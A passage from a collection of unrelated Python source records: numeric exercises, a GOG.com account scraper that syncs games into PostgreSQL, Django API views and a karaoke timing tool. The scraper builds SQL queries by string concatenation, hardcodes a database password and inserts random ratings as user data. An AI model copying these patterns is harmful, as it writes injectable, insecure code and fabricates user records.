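    fields = datagram.decode().split('\n')[0].split(',')
    if len(fields) != 3:
        return None                      # malformed packet: ignore, as the script does
    return [float(f) for f in fields]

print(parse_angles(b"90.0,45.0,120.0\n"))    # [90.0, 45.0, 120.0]
```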
num_of_guess)\n    if abs(guess**2 - square) >= epsilon:\n        print('Failed')\n    else:\n        print(guess, 'is close to the square root of', square)\nif __name__ == \"__main__\":\n    main()","sub_path":"M5/p2/p2/square_root.py","file_name":"square_root.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} {"seq_id":"98975186","text":"#The circulant (wrap-around) nature of the dft can sometimes be\n#problematic.  Write a routine to take the convolution of two arrays\n#*without* any danger of wrapping around.  You may wish to add zeros\n#to the end of the input arrays.  \n\n\nfrom numpy.fft import fft,ifft\nimport numpy\nfrom matplotlib import pyplot as plt\n\ndef conv_nowrap(x,y):\n    assert(x.size==y.size) #if the vectors are different sizes, get grumpy\n    #now we need to make double length arrays padded with zeros at the end\n    #this way a value at the end of the first array convolved with a value at\n    #the end of the second array will end up at the end of the padded array\n    xx=numpy.zeros(2*x.size)\n    xx[0:x.size]=x\n\n    yy=numpy.zeros(2*y.size)\n    yy[0:y.size]=y\n    xxft=fft(xx)\n    yyft=fft(yy)\n    vec=numpy.real(ifft(xxft*yyft))\n    return vec[0:x.size]\n\nif __name__=='__main__':\n    x=numpy.arange(-20,20,0.1)\n    sigma=2\n    y=numpy.exp(-0.5*x**2/sigma**2)\n    y=y/y.sum()\n\n    yconv=conv_nowrap(y,y)\n    plt.plot(x,y)\n    plt.plot(x,yconv)\n    plt.show()\n\n    \n","sub_path":"tut4.py","file_name":"tut4.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} {"seq_id":"535738486","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\n# imports\nimport sys\nimport logging\nimport contextlib\nimport json\nimport html5lib\nimport time\nimport getpass\nimport argparse\nimport codecs\nimport datetime\nimport socket\nimport http.cookiejar as cookiejar\nfrom http.client import BadStatusLine\nfrom urllib.parse import urlencode\nfrom urllib.request import HTTPCookieProcessor, HTTPError, URLError, build_opener, Request\nimport psycopg2\nimport requests\nfrom bs4 import BeautifulSoup\nfrom random import randint\n\n\n# thanks to this game-downloading program for the ability to hook up GOG\n# https://github.com/eddie3/gogrepo\n\n\n# fallback stub\ntry:\n    from html2text import html2text\nexcept ImportError:\n    def html2text(x):\n        return x\n\n# library tweak to bypass the cookie expiry check\ncookiejar.MozillaCookieJar.magic_re = r'.*'\n\n# logging\nlogFormatter = logging.Formatter(\"%(asctime)s | %(message)s\", datefmt='%H:%M:%S')\nrootLogger = logging.getLogger('ws')\nrootLogger.setLevel(logging.DEBUG)\nconsoleHandler = logging.StreamHandler(sys.stdout)\nconsoleHandler.setFormatter(logFormatter)\nrootLogger.addHandler(consoleHandler)\ninfo = rootLogger.info\nwarn = rootLogger.warning\ndebug = rootLogger.debug\nerror = rootLogger.error\nlog_exception = rootLogger.exception\n\n# plumbing for the web part\nglobal_cookies = cookiejar.LWPCookieJar()\ncookieproc = HTTPCookieProcessor(global_cookies)\nopener = build_opener(cookieproc)\ntreebuilder = html5lib.treebuilders.getTreeBuilder('etree')\nparser = html5lib.HTMLParser(tree=treebuilder, namespaceHTMLElements=False)\n\n# GOG URLs\nGOG_HOME_URL = r'https://www.gog.com'\nGOG_ACCOUNT_URL = r'https://www.gog.com/account'\nGOG_LOGIN_URL = r'https://login.gog.com/login_check'\nGOG_API_URL = r'http://api.gog.com/products'\n\n# Constants\nGOG_MEDIA_TYPE_GAME = 
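The `square_root.py` record above finds a square root by scanning upward in 0.0001 increments, which takes tens of thousands of guesses. As a point of comparison, bisection reaches the same tolerance in roughly fifty iterations; a standalone sketch (not part of the original file):

```python
# Bisection alternative to the linear scan in square_root.py; epsilon matches
# the original's 0.01 tolerance. Works for inputs >= 0.
def bisect_sqrt(square, epsilon=0.01):
    lo, hi = 0.0, max(square, 1.0)       # hi=1.0 covers inputs below 1
    guess = (lo + hi) / 2
    while abs(guess ** 2 - square) >= epsilon:
        if guess ** 2 < square:
            lo = guess
        else:
            hi = guess
        guess = (lo + hi) / 2
    return guess

print(bisect_sqrt(25))   # ~5.0
```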
'1'\nGOG_MEDIA_TYPE_MOVIE = '2'\n\n# HTTP request settings\nHTTP_FETCH_DELAY = 1\nHTTP_RETRY_DELAY = 5\nHTTP_RETRY_COUNT = 3\nHTTP_PERM_ERRORCODES = (404, 403, 503)\n\n# These file types don't have md5 data from GOG\nSKIP_MD5_FILE_EXT = ['.txt', '.zip']\n\n\ndef request(url, args=None, byte_range=None, retries=HTTP_RETRY_COUNT, delay=HTTP_FETCH_DELAY):\n    # web requests with retries\n    _retry = False\n    time.sleep(delay)\n\n    try:\n        if args is not None:\n            enc_args = urlencode(args)\n            enc_args = enc_args.encode('ascii')\n        else:\n            enc_args = None\n        req = Request(url, data=enc_args)\n        if byte_range is not None:\n            req.add_header('Range', 'bytes=%d-%d' % byte_range)\n        page = opener.open(req)\n    except (HTTPError, URLError, socket.error, BadStatusLine) as e:\n        if isinstance(e, HTTPError):\n            if e.code in HTTP_PERM_ERRORCODES:\n                warn('request error: %s.', e)\n                raise\n        if retries > 0:\n            _retry = True\n        else:\n            raise\n\n        if _retry:\n            warn('request error: %s (%d retries left) -- retrying in %ds...' % (e, retries, HTTP_RETRY_DELAY))\n            return request(url=url, args=args, byte_range=byte_range, retries=retries - 1, delay=HTTP_RETRY_DELAY)\n\n    return contextlib.closing(page)\n\n\n# --------------------------\n# Additional types and helpers\n# --------------------------\n\nclass AttrDict(dict):\n    def __init__(self, **kw):\n        self.update(kw)\n\n    def __getattr__(self, key):\n        return self[key]\n\n    def __setattr__(self, key, val):\n        self[key] = val\n\n\ndef item_checkdb(search_id, gamesdb):\n    for i in range(len(gamesdb)):\n        if search_id == gamesdb[i].id:\n            return i\n    return None\n\n\ndef rename_genres(genre):\n    # maps the Russian genre labels returned by GOG to their English names\n    genrestable = {'Приключение': 'Adventure',\n                   'Стратегия': 'Strategy',\n                   'Ролевая игра': 'RPG',\n                   'Экшн': 'Action',\n                   'Симулятор': 'Simulation',\n                   'Шутер': 'Shooter',\n                   'Инди': 'Indie',\n                   'Гонки': 'Racing'}\n    return genrestable[genre]\n\n\ndef process_argv(argv):\n    p1 = argparse.ArgumentParser(description='%s' % ('Log in to the GOG service'))\n    p1.add_argument('user', action='store', help='User', nargs='?', default=None)\n    p1.add_argument('username', action='store', help='GOG login/email', nargs='?', default=None)\n    p1.add_argument('password', action='store', help='GOG password', nargs='?', default=None)\n\n    # parse the received arguments, raising an error if needed\n    args = p1.parse_args(argv[1:])\n    return args\n\n\n# --------\n# Commands\n# --------\n\ndef cmd_login(user, passwd):\n    # log in to GOG\n    login_data = {'user': user,\n                  'passwd': passwd,\n                  'auth_url': None,\n                  'login_token': None,\n                  'two_step_url': None,\n                  'two_step_token': None,\n                  'two_step_security_code': None,\n                  'login_success': False,\n                  }\n\n    global_cookies.clear()\n\n    # prompt for login/password if needed\n    if login_data['user'] is None:\n        login_data['user'] = input(\"Login: \")\n    if login_data['passwd'] is None:\n        login_data['passwd'] = getpass.getpass()\n\n    info(\"attempting to log in as '{}' ...\".format(login_data['user']))\n\n    # fetch the login url\n    with request(GOG_HOME_URL, delay=0) as page:\n        etree = html5lib.parse(page, namespaceHTMLElements=False)\n        for elm in etree.findall('.//script'):\n            if elm.text is not None and 'GalaxyAccounts' in elm.text:\n                login_data['auth_url'] = elm.text.split(\"'\")[3]\n                break\n\n    # extract the login token\n    with request(login_data['auth_url'], delay=0) as page:\n        etree = html5lib.parse(page, namespaceHTMLElements=False)\n        # bail out if a captcha challenge comes back\n        if len(etree.findall('.//div[@class=\"g-recaptcha form__recaptcha\"]')) > 0:\n            error(\"cannot continue, GOG 
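The `request()` helper above implements a fixed-delay retry loop over `urllib`, retrying transient failures and giving up on permanent HTTP error codes. A generic, self-contained sketch of that discipline; `fetch` is a hypothetical callable standing in for `opener.open()`:

```python
import time

# Retry pattern as in request() above: a fixed number of attempts with a
# sleep between them; non-retryable errors would be re-raised immediately.
def with_retries(fetch, retries=3, delay=5):
    for attempt in range(retries + 1):
        try:
            return fetch()
        except OSError:                  # stand-in for HTTPError/URLError/socket.error
            if attempt == retries:
                raise                    # out of retries: propagate the failure
            time.sleep(delay)

print(with_retries(lambda: "ok"))
```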
требует ввод reCAPTCHA\")\n return\n for elm in etree.findall('.//input'):\n if elm.attrib['id'] == 'login__token':\n login_data['login_token'] = elm.attrib['value']\n break\n\n # пытаемся залогиниться и получаем запрос на двухэтапную авторизацию\n with request(GOG_LOGIN_URL, delay=0, args={'login[username]': login_data['user'],\n 'login[password]': login_data['passwd'],\n 'login[login]': '',\n 'login[_token]': login_data['login_token']}) as page:\n etree = html5lib.parse(page, namespaceHTMLElements=False)\n if 'two_step' in page.geturl():\n login_data['two_step_url'] = page.geturl()\n for elm in etree.findall('.//input'):\n if elm.attrib['id'] == 'second_step_authentication__token':\n login_data['two_step_token'] = elm.attrib['value']\n break\n elif 'on_login_success' in page.geturl():\n login_data['login_success'] = True\n\n # проводим двухэтапную\n if login_data['two_step_url'] is not None:\n login_data['two_step_security_code'] = input(\"введите код двухэтапной авторизации: \")\n\n # отправляем код обратно\n with request(login_data['two_step_url'], delay=0,\n args={'second_step_authentication[token][letter_1]': login_data['two_step_security_code'][0],\n 'second_step_authentication[token][letter_2]': login_data['two_step_security_code'][1],\n 'second_step_authentication[token][letter_3]': login_data['two_step_security_code'][2],\n 'second_step_authentication[token][letter_4]': login_data['two_step_security_code'][3],\n 'second_step_authentication[send]': \"\",\n 'second_step_authentication[_token]': login_data['two_step_token']}) as page:\n if 'on_login_success' in page.geturl():\n login_data['login_success'] = True\n\n # выводим результат\n if login_data['login_success']:\n info('вход выполнен')\n else:\n error('вход не выполнен, проверьте введённые данные')\n\n\ndef cmd_update(UserID):\n media_type = GOG_MEDIA_TYPE_GAME\n i = 0\n\n api_url = GOG_ACCOUNT_URL\n api_url += \"/getFilteredProducts\"\n\n # получаем данные игр\n done1 = False\n done2 = False\n info('подключение к базе')\n conn = psycopg2.connect(dbname='game_shelf', user='pacas', password='12345', host='127.0.0.1', port='5432', connect_timeout=5)\n cursor = conn.cursor()\n info('подключено')\n cursor.execute(\"SELECT id FROM users WHERE login = '\" + UserID + \"'\")\n UserID = cursor.fetchall()\n UserID = UserID[0][0]\n\n # метод для получения информации о имеющихся играх в базе\n cursor.callproc('get_all_platform_games', ['GOG.com'])\n gameid = cursor.fetchall()\n DBGames = set()\n if len(gameid) != 0:\n for j in gameid:\n DBGames.add(j[0])\n\n GOGList = set()\n while not done1:\n i += 1\n url = api_url + \"?\" + urlencode({'mediaType': media_type,\n 'sortBy': 'title',\n 'page': str(i)})\n\n with request(url, delay=0) as data_request:\n reader = codecs.getreader(\"utf-8\")\n try:\n json_data = json.load(reader(data_request))\n except ValueError:\n error('ошибка получения данных')\n cursor.close()\n conn.close()\n raise SystemExit(1)\n\n for item_json_data in json_data['products']:\n GOGList.add(str(item_json_data['id']))\n\n if i >= json_data['totalPages']:\n done1 = True\n\n diff = GOGList.difference(DBGames)\n info('начинаем синхронизацию')\n i = 0\n while not done2:\n i += 1\n info('получение данных')\n\n url = api_url + \"?\" + urlencode({'mediaType': media_type,\n 'sortBy': 'title',\n 'page': str(i)})\n\n with request(url, delay=0) as data_request:\n reader = codecs.getreader(\"utf-8\")\n try:\n json_data = json.load(reader(data_request))\n except ValueError:\n error('ошибка получения данных')\n cursor.close()\n 
conn.close()\n                raise SystemExit(1)\n\n        for item_json_data in json_data['products']:\n            GOGList.add(str(item_json_data['id']))\n\n        if i >= json_data['totalPages']:\n            done1 = True\n\n    diff = GOGList.difference(DBGames)\n    info('starting synchronization')\n    i = 0\n    while not done2:\n        i += 1\n        info('fetching data')\n\n        url = api_url + \"?\" + urlencode({'mediaType': media_type,\n                                         'sortBy': 'title',\n                                         'page': str(i)})\n\n        with request(url, delay=0) as data_request:\n            reader = codecs.getreader(\"utf-8\")\n            try:\n                json_data = json.load(reader(data_request))\n            except ValueError:\n                error('failed to fetch data')\n                cursor.close()\n                conn.close()\n                raise SystemExit(1)\n\n        # parse the fields of interest into a dict\n        for item_json_data in json_data['products']:\n            ID = item_json_data['id']\n            if str(ID) in diff:\n                long_title = item_json_data['title']\n                genre = item_json_data['category']\n                store_url = item_json_data['url']\n\n                if '/game/' in store_url:\n                    check = 1\n                    store_url = GOG_HOME_URL + store_url\n                    response = requests.get(store_url)\n                    soup = BeautifulSoup(response.text, 'html.parser')\n                    full_list = soup.find_all(class_='details__content table__row-content')\n                    found = ''\n                    found += str(full_list[3])\n                    found += str(full_list[2])\n                    c = [r for r in range(len(found)) if found.startswith('href=\"/games?devpub=', r)]\n                    a = found.find(\"eventLabel: 'Developer: \")\n                    b = found.find(\"eventLabel: 'Publisher: \")\n                    dev = str(found[a + 24:c[0] - 4])\n                    pub = str(found[b + 24:c[1] - 4])\n\n                    # check that the developer exists, otherwise create it\n                    cursor.execute(\"SELECT EXISTS(SELECT name FROM companies WHERE name = '\" + dev + \"')\")\n                    records = cursor.fetchall()\n                    if str(records[0][0]) == 'False':\n                        cursor.callproc('insert_company', [dev, None])\n\n                    # check that the publisher exists, otherwise create it\n                    cursor.execute(\"SELECT EXISTS(SELECT name FROM companies WHERE name = '\" + pub + \"')\")\n                    records = cursor.fetchall()\n                    if str(records[0][0]) == 'False':\n                        cursor.callproc('insert_company', [pub, None])\n                else:\n                    check = 0\n\n                # check that the genre exists, otherwise create it\n                if genre != '':\n                    genre = rename_genres(genre)\n                    cursor.execute(\"SELECT EXISTS(SELECT name FROM genres WHERE name = '\" + genre + \"')\")\n                    records = cursor.fetchall()\n                    if str(records[0][0]) == 'False':\n                        cursor.callproc('insert_genre', [genre, None])\n\n                addapi_url = GOG_API_URL\n                addapi_url += \"/\" + str(ID) + \"?expand=expanded_dlcs,description,screenshots,videos\"\n                try:\n                    with request(addapi_url) as data_request:\n                        reader = codecs.getreader(\"utf-8\")\n                        item_json_data_additional = json.load(reader(data_request))\n\n                        image = item_json_data_additional['images']\n                        image = image['logo2x']\n                        image = image.replace('\\/', '/')\n                        image = image[2:]\n                        release_date = item_json_data_additional['release_date']\n                        description = item_json_data_additional['description']\n                        description = description['lead']\n\n                except Exception:\n                    log_exception('error')\n\n                # add the game\n                info('adding game %s' % long_title)\n                cursor.callproc('insert_game', ['GOG.com', str(ID), long_title, release_date, description, image])\n                GameID = cursor.fetchall()\n                GameID = GameID[0][0]\n\n                # link the game to its genre\n                cursor.callproc('attach_game_genre', [GameID, genre])\n\n                # link the game to the platform\n                cursor.callproc('attach_game_platform', [GameID, 'GOG.com', str(ID), store_url])\n\n                if check == 1:\n                    # link the game to its developers\n                    cursor.callproc('attach_game_developer', [GameID, dev])\n\n                    # link the game to its publishers\n                    cursor.callproc('attach_game_publisher', [GameID, pub])\n                else:\n                    cursor.callproc('attach_game_developer', [GameID, ''])\n                    cursor.callproc('attach_game_publisher', [GameID, ''])\n\n                cursor.callproc('attach_user_game', [UserID, GameID, 'GOG.com', 0])\n\n                # add a rating\n                rate = randint(0, 10)\n                cursor.callproc('insert_or_update_rate', [UserID, GameID, rate, None])\n\n        cursor.execute(\"COMMIT;\")\n\n        if i >= json_data['totalPages']:\n            done2 = True\n\n    # close the connection\n    cursor.close()\n    conn.close()\n\n    '''\n    Useful links:\n    embed.gog.com/userData.json - info with the user id\n    embed.gog.com/users/info/48628349971017?expand=friendStatus,wishlistStatus,blockedStatus\n    
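One caveat worth noting on the record above: several queries splice values into SQL by string concatenation (e.g. `"SELECT id FROM users WHERE login = '" + UserID + "'"`), which is vulnerable to SQL injection and breaks on names containing quotes. With psycopg2, which the script already uses, the safer equivalent passes parameters separately; a sketch using the same schema names as the record (no live database is assumed here):

```python
# Parameterized variant of the EXISTS check above; psycopg2 escapes the value,
# so quotes in company names are safe and injection is impossible.
def company_exists(cursor, name):
    cursor.execute(
        "SELECT EXISTS(SELECT name FROM companies WHERE name = %s)",
        (name,),                 # values travel separately from the SQL text
    )
    return cursor.fetchone()[0]
```

The `%s` placeholder is psycopg2's standard parameter style regardless of the column type; only the query shape comes from the record above.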
'''\n\n\ndef main(args):\n stime = datetime.datetime.now()\n cmd_login(args.username, args.password)\n cmd_update(args.user)\n etime = datetime.datetime.now()\n info('--')\n info('общее время: %s' % (etime - stime))\n\n\nif __name__ == \"__main__\":\n try:\n main(process_argv(sys.argv))\n info('выход...')\n except KeyboardInterrupt:\n info('выход...')\n sys.exit(1)\n except SystemExit:\n raise\n except:\n log_exception('ошибка...')\n sys.exit(1)\n","sub_path":"gog_api_module.py","file_name":"gog_api_module.py","file_ext":"py","file_size_in_byte":17392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"411334677","text":"import json\n\nfrom django.http import JsonResponse\nfrom django.views.decorators.http import require_http_methods\n\nfrom authentication import authenticator\nfrom machine import machine_controller\nfrom server.utils import HandleError\n\n\n@require_http_methods(['POST'])\n@authenticator.RequireAuth\n@HandleError\ndef GetAllMachineInfo(request):\n return JsonResponse({'machines': machine_controller.GetAllMachineInfo()})\n\n\n@require_http_methods(['POST'])\n@authenticator.RequireAuth\n@HandleError\ndef AddMachine(request):\n reqJson = json.loads(request.body)\n return JsonResponse({\n 'result': machine_controller.AddMachine(\n reqJson['name'], reqJson['user'], reqJson['host'], reqJson['auth_key']),\n })\n\n\n@require_http_methods(['POST'])\n@authenticator.RequireAuth\n@HandleError\ndef UpdateMachine(request):\n reqJson = json.loads(request.body)\n return JsonResponse({\n 'result': machine_controller.UpdateMachine(\n reqJson['name'], reqJson['user'], reqJson['host'], reqJson['auth_key']),\n })\n\n\n@require_http_methods(['POST'])\n@authenticator.RequireAuth\n@HandleError\ndef DeleteMachine(request):\n reqJson = json.loads(request.body)\n machine_controller.DeleteMachine(reqJson['name'])\n return JsonResponse({'result': 'DONE'})\n\n\n@require_http_methods(['POST'])\n@authenticator.RequireAuth\n@HandleError\ndef SessionListMachines(request):\n return JsonResponse({'result': machine_controller.ListMachines()})\n\n\n@require_http_methods(['POST'])\n@authenticator.RequireAuth\n@HandleError\ndef SessionPathStat(request):\n reqJson = json.loads(request.body)\n session_name = reqJson['session_name']\n machine_name = reqJson.get('machine_name', None)\n path = reqJson.get('path', None)\n controller = machine_controller.SessionController(session_name)\n return JsonResponse(controller.PathStat(machine_name, path))\n","sub_path":"machine/apis.py","file_name":"apis.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"328553833","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright 2015, Fabrice Laporte\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the\n# \"Software\"), to deal in the Software without restriction, including\n# without limitation the rights to use, copy, modify, merge, publish,\n# distribute, sublicense, and/or sell copies of the Software, and to\n# permit persons to whom the Software is furnished to do so, subject to\n# the following conditions:\n#\n# The above copyright notice and this permission notice shall be\n# included in all copies or substantial portions of the Software.\n\nfrom __future__ import (division, absolute_import, print_function,\n unicode_literals)\n\nimport logging\nimport os\nimport sys\nimport 
time\nimport re\n\nfrom blessed import Terminal\nfrom collections import namedtuple\nfrom contextlib import contextmanager\nfrom datetime import timedelta\n\nfrom keroaek import vlc\n\nLOG_FILENAME = 'keroaek.log'\nlogging.getLogger('').handlers = []\nlogging.basicConfig(filename=LOG_FILENAME, filemode='a', level=logging.DEBUG)\n\nlogger = logging.getLogger(__name__)\n\nLine = namedtuple('Line', 'words consumed text timings')\nterm = Terminal()\nSHIFT_DELAY_MS = 1500\n\n\n@contextmanager\ndef stderr_redirected(to=os.devnull):\n '''\n import os\n\n with stderr_redirected(to=filename):\n print(\"from Python\")\n os.system(\"echo non-Python applications are also supported\")\n '''\n fd = sys.stderr.fileno()\n\n def _redirect_stderr(to):\n sys.stderr.close() # + implicit flush()\n os.dup2(to.fileno(), fd) # fd writes to 'to' file\n sys.stderr = os.fdopen(fd, 'w') # Python writes to fd\n\n with os.fdopen(os.dup(fd), 'w') as old_stderr:\n with open(to, 'w') as file:\n _redirect_stderr(to=file)\n try:\n yield # allow code to be run with the redirected stderr\n finally:\n _redirect_stderr(to=old_stderr)\n\n\nTIMESTAMP_RE = r'(\\[\\d\\d:\\d\\d\\.\\d\\d\\])'\n\n\ndef convert_to_ms(text):\n \"\"\"Convert a text expressed as mm:ss.xx to milliseconds\n \"\"\"\n if text:\n mm, ss_xx = text.split(':')\n ss, xx = ss_xx.split('.')\n return timedelta(minutes=int(mm), seconds=int(ss),\n milliseconds=int(xx) * 10).total_seconds() * 1000\n\n\ndef parse_lrc(text):\n \"\"\"Return a tuple (timestamps, texts), each text starting at timestamp with\n same index.\n \"\"\"\n tokens = re.split(TIMESTAMP_RE, text)\n if len(tokens) == 1:\n return [None], tokens[0].split(' ')\n tokens = tokens[1:]\n return [x[1:-1] for x in tokens[0::2]], [x.strip() for x in tokens[1::2]]\n\n\ndef no_markup(text):\n \"\"\"Clean up text to remove timestamp markups\n \"\"\"\n return ' '.join(parse_lrc(text)[1])\n\n\nclass TopPanel():\n def __init__(self):\n title = 'keroaek'\n print(term.reverse(title + ' ' * (term.width - len(title))), end='')\n\n\nclass VersePanel():\n def __init__(self, text, verse_id=-1):\n \"\"\"Store verses internally by splitting input text at '\\n\\n'\n \"\"\"\n self.verses = []\n for (i, verse) in enumerate(text.split(u'\\n\\n')):\n self.verses.append(dict(lines=[x for x in verse.split(u'\\n')\n if x.strip()], key=i))\n self.verse_id = verse_id\n # self.select(verse_id)\n\n def next(self):\n if self.verse_id + 1 < len(self.verses):\n return self.verses[self.verse_id + 1]\n return self.verses[0]\n\n def select(self, verse_id=-1):\n if len(self.verses) == 1:\n return self.verses[self.verse_id]\n if verse_id == -1:\n self.verse_id += 1\n else:\n self.verse_id = verse_id\n if self.verse_id >= len(self.verses):\n self.verse_id = 0\n key = 0\n entrylen = 20\n colwidth = entrylen + 5\n rows = int(len(self.verses) / (term.width / colwidth)) + 1\n print(term.move_x(0), end='')\n for y in range(rows):\n for x in range(0, term.width - colwidth, colwidth):\n if key == len(self.verses):\n break\n with term.location():\n entry = no_markup(self.verses[key]['lines'][0])[:entrylen]\n print(x * term.move_right(), end='')\n self.verses[key]['position'] = (x, y)\n if key == self.verse_id:\n print('%s %s' % (term.black_on_yellow(str(key + 1)),\n term.black_on_yellow(entry)), end='')\n else:\n print('%s %s' % (term.reverse(str(key + 1)), entry),\n end='')\n key += 1\n else:\n print(term.move_down(), end='')\n continue\n print(term.move_down(), end='')\n print('━' * term.width)\n return self.verses[self.verse_id]\n\n\nclass 
Line(object):\n def __init__(self, text):\n # detect if text contains markups\n timestamps, tokens = parse_lrc(text)\n self.tokens = tokens\n self.reset([convert_to_ms(t) for t in timestamps if t])\n\n @property\n def timestamp(self):\n return self.timestamps[self.pos]\n\n @timestamp.setter\n def timestamp(self, value):\n self.timestamps[self.pos] = value\n\n @property\n def past_tokens(self):\n return self.tokens[:self.pos]\n\n @property\n def next_tokens(self):\n return self.tokens[self.pos:]\n\n def reset(self, timestamps=None):\n self.pos = 0\n if timestamps:\n self.timestamps = timestamps\n else:\n self.timestamps = [None] * len(self.tokens)\n\n def text(self, past=False, next=False):\n if past:\n return ' '.join(self.past_tokens)\n elif next:\n return ' '.join(self.next_tokens)\n else:\n return ' '.join(self.tokens)\n\n def eol(self):\n res = self.pos == len(self.tokens)\n return res\n\n\nclass MainPanel(object):\n\n def __init__(self, lines):\n self.xoff = 3\n self.lines = [Line(l) for l in lines]\n self.pos = 0\n print(term.move_down(), end='')\n self.display()\n\n @property\n def current_line(self):\n \"\"\"Get current active line\n \"\"\"\n return self.lines[self.pos]\n\n def display(self):\n \"\"\"Print remaining lines to timestamp of current verse.\n \"\"\"\n # Cleanup canvas\n with term.location():\n print(term.move_up(), end='')\n\n for line in range(len(self.lines) + 1):\n print(term.move_x(0) + term.clear_eol)\n\n with term.location():\n print(term.move_up(), end='')\n # Buffer: showing last line done\n if self.pos != 0:\n print (term.move_x(self.xoff) +\n self.lines[self.pos - 1].text())\n else:\n print('')\n for line in self.lines[self.pos:]:\n print(term.move_x(self.xoff) + line.text())\n sys.stdout.flush()\n print(term.move_x(self.xoff), end='')\n\n def next(self):\n \"\"\"Shift verse current line to next line or return False if no next\n line.\n \"\"\"\n if self.eov():\n return False\n self.pos += 1\n self.display()\n return True\n\n def eov(self):\n \"\"\"End of verse\"\"\"\n return self.pos >= len(self.lines) - 1\n\n def previous(self):\n \"\"\"Return False if we were positioned at first line already.\n \"\"\"\n if self.pos == 0:\n return False\n self.pos -= 1\n self.current_line.reset()\n self.display()\n return True\n\n def print_line(self, text, clear=False, end=''):\n \"\"\"Print line while keeping panel left offset.\n \"\"\"\n if clear:\n print(term.move_x(0), end='')\n print(term.clear_eol, end=end)\n print(term.move_x(self.xoff) + text, end='')\n\n def move_cursor(self, direction):\n \"\"\"Move cursor into direction\n \"\"\"\n print(getattr(term, 'move_' + direction), end='')\n\n def update_wait_indicator(self, wait_ms):\n \"\"\"Print status character corresponding to given waiting time\n \"\"\"\n statuses = ((5000, '-'),\n (4000, '▇'),\n (3000, '▃'),\n (2000, term.yellow('▂')),\n (1000, term.red('▁')))\n with term.location():\n for (threshold, c) in statuses:\n if wait_ms > threshold:\n print(term.move_x(0) + c, end='')\n return\n\n def play(self, _time):\n if not self.current_line.eol():\n if self.current_line.timestamp:\n wait_ms = self.current_line.timestamp - _time\n if wait_ms > 0:\n self.update_wait_indicator(wait_ms)\n return\n self.timestamp(_time, play=True)\n return self.current_line.eol()\n\n def end_line_break(self):\n \"\"\"Pause at eol before overwriting current line\n \"\"\"\n next_line_start = self.lines[self.pos + 1].timestamp\n if next_line_start:\n # Give a short hint that last word has been processed\n # before greying out the line\n gap = 
next_line_start - self.current_line.timestamps[-1]\n else:\n gap = 100\n\n time.sleep(max(gap, 0) / 1000)\n\n def timestamp(self, _time, play=False):\n \"\"\"Assign given timestamp to line.\n Return remaining number of tokens to timestamp in the line.\n \"\"\"\n self.current_line.timestamp = _time\n self.current_line.pos += 1\n self.print_line(self.current_line.text(), clear=True)\n\n if not self.current_line.eol():\n self.print_line(self.current_line.text(past=True) + ' ')\n print(term.underline(self.current_line.next_tokens[0]), end='')\n self.print_line(term.yellow(self.current_line.text(past=True)))\n\n sys.stdout.flush()\n eol = self.current_line.eol()\n if eol and not self.eov():\n self.end_line_break()\n return eol\n\n\nclass Editor(object):\n def __init__(self):\n self.vlc_instance = vlc.Instance()\n self.player = self.vlc_instance.media_player_new()\n\n def replay_line(self, line_text, timings):\n if timings:\n self.player.set_time(timings[-1][-1] - 2000)\n else:\n self.player.set_time(0)\n self.forward_cursor(0)\n self.player.play()\n return Line(words=line_text.split(), consumed=[], timings=[])\n\n def reflow(self, verse_id=-1):\n print(term.enter_fullscreen)\n term.clear()\n print(term.clear + term.enter_fullscreen, end='')\n self.top_pan = TopPanel()\n verse = self.verse_pan.select(verse_id)\n self.main_pan = MainPanel(verse['lines'][:])\n\n def end_verse_break(self):\n \"\"\"Pause until next verse starts and return verse lines.\n \"\"\"\n try:\n next_line = self.verse_pan.next()['lines'][0]\n except KeyError:\n next_line = None\n if next_line:\n timestamps, _ = parse_lrc(next_line)\n if any(timestamps):\n time.sleep((convert_to_ms(timestamps[0]) -\n self.main_pan.current_line.timestamps[-1]) / 1000)\n return self.main_pan.lines\n\n def split_verse(self):\n lines = self.verse_pan.select(self.verse_pan.verse_id)['lines']\n before_verse = dict(lines=lines[:self.main_pan.pos],\n key=self.verse_pan.verse_id)\n after_verse = dict(lines=lines[self.main_pan.pos:],\n key=len(self.verse_pan.verses))\n self.verse_pan.verses[self.verse_pan.verse_id] = before_verse\n self.verse_pan.verses.append(after_verse)\n return self.main_pan.lines[:self.main_pan.pos]\n\n def sync(self, audio, lyrics):\n self.player.set_media(self.vlc_instance.media_new(audio))\n timed_lines = []\n self.verse_pan = VersePanel(lyrics)\n self.reflow()\n with stderr_redirected(to=os.devnull):\n while True:\n sys.stdout.flush()\n self.player.play()\n with term.cbreak():\n val = None\n while val not in (u'q', u'Q',):\n sys.stdout.flush()\n val = term.inkey(timeout=.1)\n eol = self.main_pan.play(self.player.get_time())\n if val:\n key = unicode(val).lower()\n if val.name == 'KEY_UP':\n self.main_pan.previous()\n if val.name == 'KEY_DOWN':\n if self.main_pan.next():\n self.main_pan.pos += 1\n self.main_pan.display()\n elif val.name == 'KEY_SRIGHT':\n pass\n elif key == u' ':\n eol = self.main_pan.\\\n timestamp(max(0, self.player.get_time() -\n SHIFT_DELAY_MS))\n elif key == u'x':\n timed_lines.append(self.split_verse())\n self.reflow()\n else:\n # Num key shortcut to jump to verse\n if val in [unicode(x['key']) for x in\n self.verse_pan.verses]:\n self.reflow(int(val) - 1)\n\n # Move to next line\n if eol and not self.main_pan.next():\n timed_lines.append(self.end_verse_break())\n self.reflow()\n break\n else:\n break\n print(term.clear())\n return self.build_lrc(timed_lines)\n\n def build_lrc(self, timed_lines):\n lrc_lines = []\n for verse in timed_lines:\n for line in verse:\n lrc_toks = []\n for (tok, tstamp) in 
